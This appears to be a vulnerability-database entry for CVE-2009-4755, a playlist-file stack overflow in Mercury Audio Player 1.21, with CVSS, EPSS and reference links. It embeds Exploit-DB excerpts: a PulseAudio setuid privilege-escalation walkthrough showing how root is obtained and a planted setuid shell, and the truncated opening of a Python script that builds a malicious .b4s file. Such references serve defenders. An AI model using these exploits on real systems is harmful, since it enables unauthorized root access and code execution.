CVE-2009-4755
Published: 2010-03-29
Priority: P3 · 51 · critical
CVSS 2.0: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 6.82% (93.2th percentile)
Multiple stack-based buffer overflows in Mercury Audio Player 1.21 allow remote attackers to execute arbitrary code via a long string in a malformed (1) .b4s or (2) .pls playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mercuryaudio | audio_player | — | — |
No detection rules found.
Exploit-DB
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
exploitdb·2009-07-20
CVE-2009-1894
---
PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and
Yorick Koster
--
Put files in /tmp/pulseaudio-exp (or change config.h). Must be on
same fs as the pulseaudio binary.
Goes faster if you already have a pulseaudio running ? :p
Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0
(x86)
Ubuntu:
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),46(plugdev)
Exploit-DB
Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow
exploitdb·2009-04-30
CVE-2009-4755
---
#usage: exploit.py
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
"\x65\x20\x74\x61\x67\x20\
No writeups or analysis indexed.
http://osvdb.org/54170
http://secunia.com/advisories/34957
http://www.exploit-db.com/exploits/8580
http://www.exploit-db.com/exploits/8582
http://www.securityfocus.com/bid/34788
https://exchange.xforce.ibmcloud.com/vulnerabilities/50288